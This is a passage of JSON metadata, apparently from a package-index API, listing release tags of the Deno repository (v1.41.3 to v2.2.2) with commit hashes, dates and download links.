deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/ta